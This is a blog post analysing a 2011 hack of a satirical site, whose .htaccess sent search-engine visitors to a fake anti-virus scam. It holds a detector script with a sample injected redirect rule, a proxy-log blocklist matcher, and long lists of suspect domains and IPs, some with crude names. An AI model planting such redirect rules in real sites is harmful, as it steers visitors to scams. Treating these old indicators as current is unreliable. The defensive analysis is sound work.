Friday, 15 July 2011

Christwire.org hacked with sokoloperkovuske.com redirect

Update: this site is now clean :)

Christwire.org is a satirical site about religion, not a million miles away from The Onion in terms of content. It's quite a popular site in the US.

Unfortunately, the site has been hacked and its .htaccess file has been altered. Visitors who reach the site by Googling "Christwire" and clicking the result (I suggest that you don't try this!) are redirected to a URL at sokoloperkovuske.com/in.php?pp=138, but if you visit the site directly you don't see anything. This type of trickery is quite common because it makes it harder for the site owner to detect the problem.
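The conditional redirect described above is usually implemented as a RewriteCond on the HTTP referrer followed by a RewriteRule to an external URL. The following checker is an added example, not code from the original post: it walks the RewriteCond/RewriteRule pairs in an .htaccess file and reports any rule that fires only for search-engine referrers and sends the visitor off-site. The sample .htaccess content is constructed (the redirect target is the URL named in the post, but the exact rule text an attacker used is not on the page and is an assumption), as is the list of search-engine hint strings.

```python
"""Flag referrer-conditional redirects to external hosts in an Apache .htaccess.

Added example, not code from the original post.  Conditions keyed on
%{HTTP_REFERER} that mention a search engine, followed by a RewriteRule whose
target is a redirect to a host other than the site's own, are reported.
"""
import re
from urllib.parse import urlparse

# Substrings that suggest a condition is keyed on search-engine referrers (assumed list).
SEARCH_ENGINE_HINTS = ("google", "bing", "yahoo", "msn", "aol", "ask")

# Constructed sample: an ordinary WordPress block followed by an injected block.
# The redirect URL is the one named in the post; the rule text is an assumption.
SAMPLE_HTACCESS = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC]
RewriteRule ^(.*)$ http://sokoloperkovuske.com/in.php?pp=138 [R=302,L]
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def _flag_names(flags):
    """Turn 'R=302,L' into {'R', 'L'} so the flag letters can be tested."""
    return {f.split("=", 1)[0].strip().upper() for f in flags.split(",") if f.strip()}


def find_referrer_redirects(htaccess_text, own_host):
    """Return one dict per suspicious rule: its line, target and condition lines."""
    own = own_host.lower()
    findings = []
    pending = []  # RewriteCond lines seen since the last RewriteRule
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        m = COND_RE.match(line)
        if m:
            pending.append((lineno, m.group(1).upper(), m.group(2).lower()))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = m.group(2), m.group(3) or ""
        conds, pending = pending, []  # conditions bind only to the next rule
        engine_conds = [ln for ln, var, pat in conds
                        if var == "%{HTTP_REFERER}"
                        and any(h in pat for h in SEARCH_ENGINE_HINTS)]
        if not engine_conds:
            continue
        parsed = urlparse(target)
        # An explicit R flag, or an absolute URL target, both produce a redirect.
        is_redirect = bool(_flag_names(flags) & {"R", "REDIRECT"}) \
            or parsed.scheme in ("http", "https")
        host = (parsed.hostname or "").lower()
        offsite = bool(host) and host not in (own, "www." + own)
        if is_redirect and offsite:
            findings.append({"line": lineno, "target": target, "conditions": engine_conds})
    return findings


if __name__ == "__main__":
    for hit in find_referrer_redirects(SAMPLE_HTACCESS, "christwire.org"):
        print("line %d redirects search-engine visitors to %s (conditions on lines %s)"
              % (hit["line"], hit["target"], hit["conditions"]))
```

Run it against your own .htaccess by reading the file into `find_referrer_redirects` with your domain as `own_host`; a referrer-conditional rule that redirects within your own site (a landing page for search visitors, say) is not reported, only rules that leave the site.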



sokoloperkovuske.com is registered with fake registration details and is hosted on 91.220.0.19, which is SIA Business Aviation Service in Latvia (Latvia is a common place for the bad guys to hang out). I would recommend blocking the entire 91.220.0.0/24 range to be on the safe side; the SiteVet report shows a sharp uptick in malicious activity for this AS.

Visitors are then redirected to a fake anti-virus site at www2.bestaholder.co.cc, which is multihomed on 112.175.243.24, 112.175.243.21, 112.175.243.22 and 112.175.243.23 in Korea. Those servers host a lot of .co.cc sites; it's worth blocking access to ALL .co.cc sites if you can.


Other potentially malicious sites on the Korean cluster are:
3adalat.co.cc
440amg.co.cc
4ggw.com
9movies.co.cc
alldir.co.cc
alynwap.co.cc
anjatan.co.cc
arai.owner.linuxmaster.co.cc
araup.co.cc
articleinfo.co.cc
asiancatchy.co.cc
astrazeneca.co.cc
baby.d0ll.co.cc
bacha.chutiya.co.cc
baithuctap.co.cc
bangkokmusic.co.cc
bayer-ah.co.cc
bayerhealthcare.co.cc
bayeryoungenvoy.co.cc
bestmusic4u.co.cc
bharwa.ghashti.ka.bacha.chutiya.co.cc
bokepmurah.co.cc
cafeislam.co.cc
campingalhassan.co.cc
cardio-bayer.co.cc
cardplanet.co.cc
carolebayersager.co.cc
cbm64.co.cc
cclmail.co.cc
chitthumyar.co.cc
chutiya.co.cc
cialislevitrasalesviagra.co.cc
cimahi.co.cc
cuimu.com
cyberwhitestar.co.cc
d0ll.co.cc
danielm2.co.cc
davidsaw.co.cc
dc-fansite.co.cc
deafdating.co.cc
desidigg.co.cc
diane.co.cc
dianearbus.co.cc
dianebishtv.co.cc
dianekruger.co.cc
dianelanenude.co.cc
dianestanley.co.cc
dianeturton.co.cc
dnf2683.com
dogs4u.co.cc
ebookprovider.co.cc
ecstechnologies.net
evanj8.co.cc
exicorp.co.cc
exs-ti.co.cc
faceboox.co.cc
femalelife.co.cc
filmesgratis.co.cc
forward.lookup.co.cc
free-mature-pics.co.cc
fullmusick.co.cc
funadult.co.cc
gamebazaar.co.cc
gameslowd.com
getarticles.co.cc
ghashti.ka.bacha.chutiya.co.cc
gocthethao.co.cc
gombel.co.cc
guapunye.nick.arai.owner.linuxmaster.co.cc
hdytaufik.co.cc
hesitate.with.malaysian-hackers.co.cc
hk.co.cc
hot.k1ss.co.cc
igratatin.co.cc
ilman-media.co.cc
intercambiosvirtuales.co.cc
iosdiy.com
jawamark.co.cc
jeff-dunham.co.cc
jilnul.co.cc
k1ss.co.cc
ka.bacha.chutiya.co.cc
kecoakwap.co.cc
kn4h.co.cc
kutopersada.co.cc
lanxess-europe.co.cc
la-videoteca.co.cc
law4u.co.cc
leechouse.co.cc
lenadianejennings-blogspot.co.cc
levitravardenafilhcl.co.cc
limsadiane.co.cc
linuxmaster.co.cc
look.sexy.with.baby.d0ll.co.cc
mail.chitthumyar.co.cc
mail.co.cc
mail.kecoakwap.co.cc
mail.pvpdestiny.co.cc
malaysian-hackers.co.cc
malekmaktabi.co.cc
marshadianearnold.co.cc
mastineedz-com.co.cc
maturecunt.veronichka.co.cc
mdacom.co.cc
me.hot.k1ss.co.cc
microchip123.co.cc
misiondejesus.com
mobitech-forums.co.cc
moccainside.co.cc
moneysukh.co.cc
my-exploit.co.cc
name-server.co.cc
navanblog.co.cc
nestle.co.cc
nestle-gifts.co.cc
nestle-icecream.co.cc
neswangy.co.cc
nick.arai.owner.linuxmaster.co.cc
nutricys.com
outerxcircle.co.cc
owner.linuxmaster.co.cc
pacar.yang.sangat.perhatian.co.cc
paltak-vip.co.cc
paullzn.com
perely.co.cc
perhatian.co.cc
picallo.co.cc
pkfc.co.cc
pprox.co.cc
proxy999.co.cc
purwokerto-allnet.co.cc
pvpdestiny.co.cc
radiowahrheit.co.cc
rafaelius.co.cc
rapiddown.co.cc
rawbeen.co.cc
realoiltd.co.cc
richardwalean.co.cc
rodrigoecheverry.co.cc
r-o-o-t.co.cc
rumbayan.co.cc
sangat.perhatian.co.cc
sawa7.co.cc
sawomanis.co.cc
sexy.with.baby.d0ll.co.cc
shibukg.co.cc
smabugil.co.cc
smppanderman.co.cc
sweetlady.co.cc
tablat.co.cc
techcenter-lanxess.co.cc
tintob.co.cc
tjssr.com
torrentmovies.co.cc
traviansoftware.co.cc
uatu.co.cc
veronichka.co.cc
viancom.co.cc
vipfashiononline.com
viuu.co.cc
vobase.com
webkontes.co.cc
wiredtree.co.cc
with.baby.d0ll.co.cc
with.malaysian-hackers.co.cc
woman-fucking-animals.veronichka.co.cc
woshiyezhu.net
xuanye.tw
yahgoo.co.cc
yang.sangat.perhatian.co.cc
yasmindavidds.co.cc
ycmi-med.co.cc
zipwaves.co.cc
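Putting the blocking advice above into practice means matching three kinds of indicator: a CIDR range (91.220.0.0/24), individual addresses (the Korean cluster) and a whole domain suffix (.co.cc). The script below is an added example, not code from the original post: it builds a small blocklist from the indicators given in the post and runs it over constructed Squid-style proxy log lines, matching both the requested hostname and the upstream peer address. The log lines, the client addresses and the 203.0.113.x/198.51.100.x peer addresses are made up for the example.

```python
"""Match the post's indicators against proxy log lines (added example).

Indicators come from the post above; log lines and non-listed addresses are
constructed for the example.  Suffix matching is label-wise, so ".co.cc"
catches "mail.co.cc" but not an unrelated "coco.cc".
"""
import ipaddress
from urllib.parse import urlparse

BLOCKED_NETWORKS = [ipaddress.ip_network("91.220.0.0/24")]
BLOCKED_IPS = {ipaddress.ip_address(a) for a in
               ("112.175.243.21", "112.175.243.22", "112.175.243.23", "112.175.243.24")}
BLOCKED_HOSTS = {"sokoloperkovuske.com", "www2.bestaholder.co.cc"}
BLOCKED_SUFFIXES = ("co.cc",)  # co.cc and every name under it

# Constructed sample in Squid native log format (fields: time, elapsed, client,
# result, bytes, method, url, user, peer, type).  Peer addresses other than
# those named in the post are documentation-range placeholders.
SAMPLE_LOG = """\
1310700001.123     45 10.0.0.5 TCP_MISS/200 5120 GET http://christwire.org/ - HIER_DIRECT/203.0.113.10 text/html
1310700002.456     30 10.0.0.5 TCP_MISS/302 512 GET http://sokoloperkovuske.com/in.php?pp=138 - HIER_DIRECT/91.220.0.19 text/html
1310700003.789     60 10.0.0.5 TCP_MISS/200 8192 GET http://www2.bestaholder.co.cc/scan.html - HIER_DIRECT/112.175.243.24 text/html
1310700004.000     20 10.0.0.7 TCP_MISS/200 1024 GET http://www.example.org/ - HIER_DIRECT/198.51.100.2 text/html
1310700005.250     35 10.0.0.7 TCP_MISS/200 2048 GET http://forward.lookup.co.cc/ - HIER_DIRECT/112.175.243.21 text/html
1310700006.500     25 10.0.0.9 TCP_MISS/200 4096 GET http://cdn.example.net/x.js - HIER_DIRECT/91.220.0.50 application/javascript
"""


def domain_blocked(host):
    """Return a reason string if the hostname is on the blocklist, else None."""
    host = host.lower().rstrip(".")
    if host in BLOCKED_HOSTS:
        return "host"
    labels = host.split(".")
    for suffix in BLOCKED_SUFFIXES:
        s = suffix.split(".")
        if len(labels) >= len(s) and labels[-len(s):] == s:
            return "suffix ." + suffix
    return None


def ip_blocked(addr):
    """Return a reason string if the address is listed or inside a listed range."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None  # not an IP literal
    if ip in BLOCKED_IPS:
        return "ip"
    for net in BLOCKED_NETWORKS:
        if ip in net:
            return "net %s" % net
    return None


def classify(target):
    """Check a hostname-or-IP string against every indicator type."""
    return ip_blocked(target) or domain_blocked(target)


def scan_squid_log(text):
    """Return (client, host, peer_ip, reason) for each log line that hits an indicator."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 9:
            continue
        client, url, peer = fields[2], fields[6], fields[8]
        host = urlparse(url).hostname or ""
        peer_ip = peer.split("/", 1)[1] if "/" in peer else ""
        reason = classify(host) or ip_blocked(peer_ip)
        if reason:
            hits.append((client, host, peer_ip, reason))
    return hits


if __name__ == "__main__":
    for client, host, peer_ip, reason in scan_squid_log(SAMPLE_LOG):
        print("%s -> %s (%s): blocked by %s" % (client, host, peer_ip, reason))
```

Checking the peer address as well as the hostname matters here: a hostname you have never heard of that resolves into the 91.220.0.0/24 range still gets caught, which is the point of blocking the range rather than the single address.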

3 comments:

Silver said...

I just encountered another web site similarly hacked, did a search in Google, clicked on http://www.howtomakemyblog.com/seo/wordpress-blog-seo/ from the search results but got redirected to sokoloperkovuske.com/in.php?pp=11 instead.

I didn't know what was happening initially, was wondering why a blank page loaded, so I actually refreshed once or twice before I noticed that the URL had changed completely and looked suspicious, so I did another quick Google with the URL and found your post here.

I had my own WordPress blog and cPanel running in Chrome at the time, but I immediately cleared all browsing data, restarted and started running scans and all that, though I do not even know if those are appropriate actions to take.

Just downloaded and installed the latest hosts file from hosts-file.net, should I add all the domains listed in your post here to the hosts file? Is that how it is supposed to be done?

Thanks.

Conrad Longmore said...

I didn't get a chance to analyse the fake AV software, but usually you have to install it first. Those things are usually fairly obvious - if you don't see anything odd then the chances are that you are not infected.

Rebel Chick said...

I was hacked by this company just a few weeks ago and had NO IDEA until last night. Thankfully, I was able to delete their redirect files with the help of a tutorial on Google!